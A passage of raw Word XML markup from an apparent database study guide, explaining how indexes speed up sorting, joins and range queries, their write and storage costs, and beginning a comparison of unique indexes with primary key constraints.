      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient Sorting and Grouping</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBDD2C7" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If a query involves sorting (ORDER BY) or grouping (GROUP BY), an index on the relevant columns can prevent the database from needing to sort the data after retrieval, saving time and computational resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C09C4" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Join Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F6624" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes can speed up joins between tables by allowing the database to quickly find matching rows across the joined tables. For example, if two tables are joined on a foreign key, an index on the foreign key column can make the join operation more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E46EC" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Range Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613AF63" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes are particularly effective for range queries (e.g., BETWEEN, &gt;, &lt;) because they allow the database to directly locate the starting point and efficiently read the range of values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C5922" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Index Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423443F8" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consider a table employees with 1 million rows. If you frequently query this table to find employees by their last_name, an index on the last_name column would allow the database to quickly narrow down the results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64626ED6" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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SELECT * FROM employees WHERE last_name = 'Smith';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F42F7E9" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Without an Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The database performs a full table scan, checking each row to see if the last_name is "Smith". This can take a long time, especially if the table is large.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D7C43" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>With an Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The database uses the index to jump directly to the rows where last_name is "Smith". This can drastically reduce the query time, from potentially seconds to milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704EF47" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C67EF" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C204D" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>While indexes speed up read operations, they can slow down write operations (INSERT, UPDATE, DELETE) because the index must be updated whenever the data in the indexed columns changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B401A11" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Storage Cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534CDD3" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes consume additional disk space, so it's essential to balance the need for speed with the cost of storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8F4B6" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Over-Indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960DAE2" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Having too many indexes can lead to diminishing returns. Each index needs maintenance, and having too many can slow down write operations and increase storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963893B" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4E4E25" w14:textId="1A94493E" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc178383313"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between a unique index and a primary key constraint</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="7B67CA57" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>unique index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>primary key constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both mechanisms used in relational databases to enforce uniqueness of data in a table, but they have some important differences in terms of functionality, purpose, and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA6AD5" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key Constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7157B5" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E6491" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A primary key uniquely identifies each record in a table. It enforces both uniqueness and non-nullability, meaning no two rows can have the same primary key value, and it cannot contain NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A4CFC9" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C44C4E" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Every value in the primary key column(s) must be unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0109A" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Nullable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A primary key column cannot contain NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D798343" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Per Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table can only have one primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD9EB2" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implicit Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When you define a primary key, the database automatically creates a unique index on the primary key column(s) to enforce uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ADF3B2" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
